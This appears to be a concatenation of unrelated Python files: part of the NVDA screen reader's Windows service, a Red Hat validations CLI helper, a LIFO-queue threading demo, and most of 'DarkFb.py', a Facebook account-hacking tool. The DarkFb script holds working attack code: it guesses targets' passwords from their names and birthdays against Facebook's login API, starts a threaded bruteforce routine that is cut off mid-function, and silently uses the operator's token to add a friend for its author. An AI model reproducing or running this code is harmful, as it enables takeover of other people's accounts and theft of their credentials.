# In Windows XP, sessions other than 0 are broken before logon, so we can't do anything more here.
debug("Windows XP, returning before action")
return
if self.isSessionLoggedOn:
# The session is logged on, so treat this as a normal desktop switch.
self.handleDesktopSwitch()
else:
# We're at the logon screen.
if shouldStartOnLogonScreen():
execBg(self.startLauncher)
execBg(self.desktopSwitchSupervisor)
def desktopSwitchSupervisor(self):
if self.desktopSwitchSupervisorStarted:
return
self.desktopSwitchSupervisorStarted = True
origSession = self.session
debug("starting desktop switch supervisor, session %d" % origSession)
desktopSwitchEvt = AutoHANDLE(windll.kernel32.OpenEventW(SYNCHRONIZE, False, u"Session\%d\WinSta0_DesktopSwitch" % self.session))
if not desktopSwitchEvt:
try:
raise WinError()
except Exception, e:
debug("error opening event: %s" % e)
raise
while True:
windll.kernel32.WaitForSingleObject(desktopSwitchEvt, INFINITE)
if self.session != origSession:
break
debug("desktop switch, session %r" % self.session)
self.handleDesktopSwitch()
debug("desktop switch supervisor terminated, session %d" % origSession)
def handleDesktopSwitch(self):
with self.launcherLock:
self.launcherStarted = False
if (not self.isSessionLoggedOn and shouldStartOnLogonScreen()) or isUserRunningNVDA(self.session):
self.startLauncher()
else:
debug("not starting launcher")
def SvcOtherEx(self, control, eventType, data):
if control == win32service.SERVICE_CONTROL_SESSIONCHANGE:
self.handleSessionChange(eventType, data[0])
def handleSessionChange(self, event, session):
if event == WTS_CONSOLE_CONNECT:
debug("connect %d" % session)
if session != self.session:
self.initSession(session)
elif event == WTS_SESSION_LOGON:
debug("logon %d" % session)
self.isSessionLoggedOn = True
execBg(self.desktopSwitchSupervisor)
elif event == WTS_SESSION_LOGOFF:
debug("logoff %d" % session)
self.isSessionLoggedOn = False
if session == 0 and shouldStartOnLogonScreen():
# In XP, a logoff in session 0 does not cause a new session to be created.
# Instead, we're probably heading back to the logon screen.
execBg(self.startLauncher)
elif event == WTS_SESSION_LOCK:
debug("lock %d" % session)
# If the user was running NVDA, the desktop switch will have started NVDA on the secure desktop.
# This only needs to cover the case where the user was not running NVDA and the session is locked.
# In this case, we should treat the lock screen like the logon screen.
if session == self.session and shouldStartOnLogonScreen():
self.startLauncher()
def startLauncher(self):
with self.launcherLock:
if self.launcherStarted:
return
debug("attempt launcher start on session %d" % self.session)
token = getSessionSystemToken(self.session)
try:
process = executeProcess(ur"WinSta0\Winlogon", token, slaveExec, u"service_NVDALauncher")
self.launcherStarted = True
debug("launcher started on session %d" % self.session)
except Exception, e:
debug("error starting launcher: %s" % e)
def SvcDoRun(self):
initDebug()
debug("service starting")
self.isWindowsXP = winVersion.winVersion[0:2] == (5, 1)
self.exitEvent = threading.Event()
self.initSession(windll.kernel32.WTSGetActiveConsoleSessionId())
self.exitEvent.wait()
debug("service exiting")
def SvcStop(self):
self.exitEvent.set()
def installService(nvdaDir):
servicePath = os.path.join(nvdaDir, __name__ + ".exe")
if not os.path.isfile(servicePath):
raise RuntimeError("Could not find service executable")
win32serviceutil.InstallService(None, NVDAService._svc_name_, NVDAService._svc_display_name_, startType=win32service.SERVICE_AUTO_START, exeName=servicePath,
# Translators: The description of the NVDA service.
description=_(u"Allows NVDA to run on the Windows Logon screen, UAC screen and other secure screens."))
def removeService():
win32serviceutil.RemoveService(NVDAService._svc_name_)
def startService():
win32serviceutil.StartService(NVDAService._svc_name_)
def stopService():
"""Stop the running service and wait for its process to die.
"""
scm = win32service.OpenSCManager(None,None,win32service.SC_MANAGER_ALL_ACCESS)
try:
serv = win32service.OpenService(scm, NVDAService._svc_name_, win32service.SERVICE_ALL_ACCESS)
try:
pid = win32service.QueryServiceStatusEx(serv)["ProcessId"]
# Stop the service.
win32service.ControlService(serv, win32service.SERVICE_CONTROL_STOP)
# Wait for the process to exit.
proc = AutoHANDLE(windll.kernel32.OpenProcess(SYNCHRONIZE, False, pid))
if not proc:
return
windll.kernel32.WaitForSingleObject(proc, INFINITE)
finally:
win32service.CloseServiceHandle(serv)
finally:
win32service.CloseServiceHandle(scm)
if __name__=='__main__':
if not getattr(sys, "frozen", None):
raise RuntimeError("Can only be run compiled with py2exe")
win32serviceutil.HandleCommandLine(NVDAService)
|
common.py
|
#!/usr/bin/env python
# Copyright 2021 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import logging
from prettytable import PrettyTable
import re
import sys
import time
import threading
import yaml
try:
from junit_xml import TestSuite, TestCase, to_xml_report_string
JUNIT_XML_FOUND = True
except ImportError:
JUNIT_XML_FOUND = False
from validations_libs import utils as v_utils
from validations_libs.cli import colors
def print_dict(data):
"""Print table from python dict with PrettyTable"""
table = PrettyTable(border=True, header=True, padding_width=1)
# Set Field name by getting the result dict keys
try:
table.field_names = data[0].keys()
table.align = 'l'
except IndexError:
raise IndexError()
for row in data:
if row.get('Status_by_Host'):
hosts = []
for host in row['Status_by_Host'].split(', '):
try:
_name, _status = host.split(',')
except ValueError:
# if ValueError, then host is in unknown state:
_name = host
_status = 'UNKNOWN'
_name = colors.color_output(_name, status=_status)
hosts.append(_name)
row['Status_by_Host'] = ', '.join(hosts)
if row.get('Status'):
status = row.get('Status')
row['Status'] = colors.color_output(status, status=status)
table.add_row(row.values())
print(table)
def write_output(output_log, results):
"""Write output log file as Json format"""
with open(output_log, 'w') as output:
output.write(json.dumps({'results': results}, indent=4,
sort_keys=True))
def write_junitxml(output_junitxml, results):
"""Write output file as JUnitXML format"""
if not JUNIT_XML_FOUND:
log = logging.getLogger(__name__ + ".write_junitxml")
log.warning('junitxml output disabled: the `junit_xml` python module '
'is missing.')
return
test_cases = []
duration_re = re.compile('([0-9]+):([0-9]+):([0-9]+).([0-9]+)')
for vitem in results:
if vitem.get('Validations'):
parsed_duration = 0
test_duration = vitem.get('Duration', '')
matched_duration = duration_re.match(test_duration)
if matched_duration:
parsed_duration = (int(matched_duration[1])*3600
+ int(matched_duration[2])*60
+ int(matched_duration[3])
+ float('0.{}'.format(matched_duration[4])))
test_stdout = vitem.get('Status_by_Host', '')
test_case = TestCase('validations', vitem['Validations'],
parsed_duration, test_stdout)
if vitem['Status'] == 'FAILED':
test_case.add_failure_info('FAILED')
test_cases.append(test_case)
ts = TestSuite("Validations", test_cases)
with open(output_junitxml, 'w') as output:
output.write(to_xml_report_string([ts]))
def read_cli_data_file(data_file):
"""Read CLI data (YAML/JSON) file.
"""
try:
with open(data_file, 'r') as _file:
return yaml.safe_load(_file.read())
except (yaml.YAMLError, IOError) as error:
error_msg = (
"The file {} must be properly formatted YAML/JSON."
"Details: {}.").format(data_file, error)
raise RuntimeError(error_msg)
class Spinner(object):
"""Animated spinner to indicate activity during processing"""
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/-\\':
yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def __enter__(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def __exit__(self, exception, value, tb):
self.busy = False
time.sleep(self.delay)
if exception is not None:
return False
|
lifoQueues.py
|
import threading
import queue
import random
import time
def mySubscriber(queue):
while not queue.empty():
item = queue.get()
if item is None:
break
print("{} removed {} from the queue".format(threading.current_thread(), item))
queue.task_done()
myQueue = queue.LifoQueue()
for i in range(10):
myQueue.put(i)
print("Queue Populated")
threads = []
for i in range(2):
thread = threading.Thread(target=mySubscriber, args=(myQueue,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
print("Queue is empty")
|
DarkFb.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93m©2020 \n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m Mas Fito \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/F1t0471 \x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mWA \x1b[1;91m: \x1b[1;92\x1b[92m0895802730022\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/100013193443252')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
